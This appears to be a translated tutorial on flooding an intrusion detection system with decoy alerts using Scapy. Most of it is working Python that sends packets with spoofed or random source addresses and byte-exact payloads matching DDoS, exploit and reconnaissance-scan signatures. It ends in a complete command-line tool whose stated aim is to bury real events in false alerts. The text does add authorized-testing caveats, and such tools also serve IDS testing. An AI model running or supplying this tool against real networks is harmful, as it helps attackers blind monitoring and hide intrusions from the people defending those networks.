So-called "spoofing" of an intrusion detection system (more precisely, alert flooding or decoy generation) works by sending packets that carry fake attack indicators — the exact header values, ports and payload bytes that an IDS signature matches on — so that the sensor raises a flood of alerts that buries real events and makes reasonable judgement hard. With Scapy, a third-party Python packet-crafting library, such packets are straightforward to build and send. Note that the packets below use spoofed source addresses, so any replies from the target go to those addresses rather than to you, and egress filtering on a routed network will often drop them; run this only against hosts and networks you are authorized to test.
First, work out the condition that triggers the alert. Assume the signature is a TFN-probe rule that fires when an ICMP packet has id 678, type 8 (echo request) and a payload containing "lyshark". We only need to construct an ICMP packet with exactly those properties and send it to the target host; a signature match is byte-exact, so any deviation in the id, the type or the payload means no alert is raised.
#!/usr/bin/python
#coding=utf-8
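from scapy.all import *


# Trigger a DDoS alert
def fuck_ddos(src, dst, iface, count):
    """Send the four packets this page pairs with DDoS-type IDS alerts.

    src and dst are dotted-quad IP strings (src may be a spoofed address),
    iface is the name of the interface to send on and count is how many
    copies of each packet to send. Returns None; the only effect is what
    scapy's send() puts on the wire, which needs raw-socket privileges
    (root / CAP_NET_RAW on Linux).
    """
    # Payloads are bytes literals so every byte reaches the wire unchanged.
    # On Python 3 scapy UTF-8-encodes a str payload, which would alter any
    # byte above 0x7F and break a byte-exact signature match.
    # ICMP echo request, id 678, body "lyshark": the TFN-probe condition
    # described above.
    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load=b'lyshark')
    send(pkt, iface=iface, count=count)
    # ICMP echo reply carrying a run of ten 'A' bytes.
    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load=b'AAAAAAAAAA')
    send(pkt, iface=iface, count=count)
    # UDP to port 31335 with the body "PONG".
    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load=b'PONG')
    send(pkt, iface=iface, count=count)
    # ICMP echo reply with id 456 and no payload.
    pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
    send(pkt, iface=iface, count=count)


# Lab addresses: importing this module sends the packets immediately, so
# adjust these before running and only point them at a host you may test.
src = "192.168.1.100"
dst = "192.168.1.200"
iface = "eth0"
count = 1
fuck_ddos(src, dst, iface, count)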
For example, when a specific byte sequence triggers an alert, build a payload containing that sequence by writing each byte as \x followed by its two-digit hexadecimal value. Put such payloads in a bytes literal (b"..."): on Python 3 a str such as "\xB0" is a one-character string that Scapy encodes as UTF-8 (two bytes, C2 B0) when it serialises the packet, so the bytes on the wire would no longer match the signature.
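# Trigger exploits alert
def exploitTest(src, dst, iface, count):
    """Send two UDP packets whose payloads match the assumed exploit signatures.

    src and dst are dotted-quad IP strings (src may be spoofed), iface is the
    sending interface and count the number of copies of each packet.
    Returns None; the packets are emitted with scapy's send().
    """
    # bytes literals: these payloads contain bytes above 0x7F, which scapy
    # would UTF-8-encode from a str on Python 3 and so break the match.
    # UDP/518 with the given byte prefix.
    pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load=b"\x01\x03\x00\x00\x00\x00\x00")
    send(pkt, iface=iface, count=count)
    # UDP/635 with the given byte prefix (note the leading literal '^').
    pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load=b"^\xB0\x02\x89\x06\xFE\xC8")
    send(pkt, iface=iface, count=count)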
Next, forge a reconnaissance-scan alert: the packet must carry the specific destination port and payload string that the scan signature matches on. Let's construct it.
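def scanTest(src, dst, iface, count):
    """Send two UDP packets whose payloads match the assumed scan signatures.

    src and dst are dotted-quad IP strings (src may be spoofed), iface is the
    sending interface and count the number of copies of each packet.
    Returns None; the packets are emitted with scapy's send().
    """
    # UDP/7 (echo) with the body "cybercop". The original sent this one with
    # send(pkt) alone, ignoring iface and count; pass both so it behaves like
    # every other packet in the script.
    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load=b'cybercop')
    send(pkt, iface=iface, count=count)
    # UDP/10080 with the body "Amanda".
    pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load=b'Amanda')
    send(pkt, iface=iface, count=count)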
Finally, we consolidate the code into one script that generates the packets triggering the DDoS, exploit and reconnaissance-scan alerts, taking the interface, source address, target address and packet count from the command line.
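#coding=utf-8
"""Generate packets that trip DDoS, exploit and reconnaissance-scan IDS alerts.

Usage: main.py -i <iface> -s <src> -t <tgt> -c <count>

The source address is spoofed (random when -s is omitted), so replies from
the target go elsewhere and egress filtering may drop the packets. scapy's
send() needs raw-socket privileges (root / CAP_NET_RAW on Linux). Only use
this against hosts and networks you are authorized to test.
"""
import optparse
from random import randint

from scapy.all import *


# Trigger DDoS alert
def ddosTest(src, dst, iface, count):
    """Send the four packets this page pairs with DDoS-type alerts.

    src and dst are dotted-quad IP strings (src may be spoofed), iface is the
    sending interface and count the number of copies of each packet.
    Returns None; the only effect is what scapy's send() puts on the wire.
    """
    # Payloads are bytes literals so every byte reaches the wire unchanged;
    # on Python 3 scapy UTF-8-encodes a str payload, which would alter any
    # byte above 0x7F and break a byte-exact signature match.
    # ICMP echo request, id 678, body "lyshark": the TFN-probe condition.
    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load=b'lyshark')
    send(pkt, iface=iface, count=count)
    # ICMP echo reply carrying a run of ten 'A' bytes.
    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load=b'AAAAAAAAAA')
    send(pkt, iface=iface, count=count)
    # UDP to port 31335 with the body "PONG".
    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load=b'PONG')
    send(pkt, iface=iface, count=count)
    # ICMP echo reply with id 456 and no payload.
    pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
    send(pkt, iface=iface, count=count)


# Trigger exploits alert
def exploitTest(src, dst, iface, count):
    """Send two UDP packets whose payloads match the assumed exploit signatures.

    Same parameters as ddosTest(); returns None.
    """
    # The standalone listing earlier on this page ends each payload one byte
    # longer (...\x00 and ...\xC8) than the consolidated copy did; the longer
    # form is used here. A content match is byte-exact, so check these
    # bytes against the rule you actually target.
    pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load=b"\x01\x03\x00\x00\x00\x00\x00")
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load=b"^\xB0\x02\x89\x06\xFE\xC8")
    send(pkt, iface=iface, count=count)


# Trigger reconnaissance scan alert
def scanTest(src, dst, iface, count):
    """Send two UDP packets whose payloads match the assumed scan signatures.

    Same parameters as ddosTest(); returns None.
    """
    # The original sent the "cybercop" packet with send(pkt) alone, ignoring
    # iface and count; pass both so it behaves like the other packets.
    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load=b'cybercop')
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load=b'Amanda')
    send(pkt, iface=iface, count=count)


def _random_source():
    """Return a random dotted-quad IPv4 string to use as the spoofed source.

    The first octet stays in 1..223 and is never 127, so the address is not
    loopback, multicast or reserved; such sources may be discarded before
    the sensor ever sees the packet.
    """
    first = randint(1, 223)
    while first == 127:
        first = randint(1, 223)
    return '.'.join([str(first)] + [str(randint(1, 254)) for _ in range(3)])


if __name__ == '__main__':
    # -i interface (default eth0), -s source address (random when omitted),
    # -t target address (required), -c copies of each packet (default 1).
    parser = optparse.OptionParser('main.py -i <iface> -s <src> -t <tgt> -c <count>')
    parser.add_option('-i', dest='iface', type='string', help='specify network interface')
    parser.add_option('-s', dest='src', type='string', help='specify source address')
    parser.add_option('-t', dest='tgt', type='string', help='specify target address')
    parser.add_option('-c', dest='count', type='int', help='specify packet count')
    (options, args) = parser.parse_args()
    if options.tgt is None:
        # A missing target is a usage error; the original exited silently
        # with status 0, which hides the mistake from scripts and users.
        parser.error('a target address (-t) is required')
    dst = options.tgt
    iface = options.iface if options.iface is not None else 'eth0'
    src = options.src if options.src is not None else _random_source()
    count = options.count if options.count is not None else 1
    if count < 1:
        parser.error('packet count (-c) must be at least 1')
    ddosTest(src, dst, iface, count)
    exploitTest(src, dst, iface, count)
    scanTest(src, dst, iface, count)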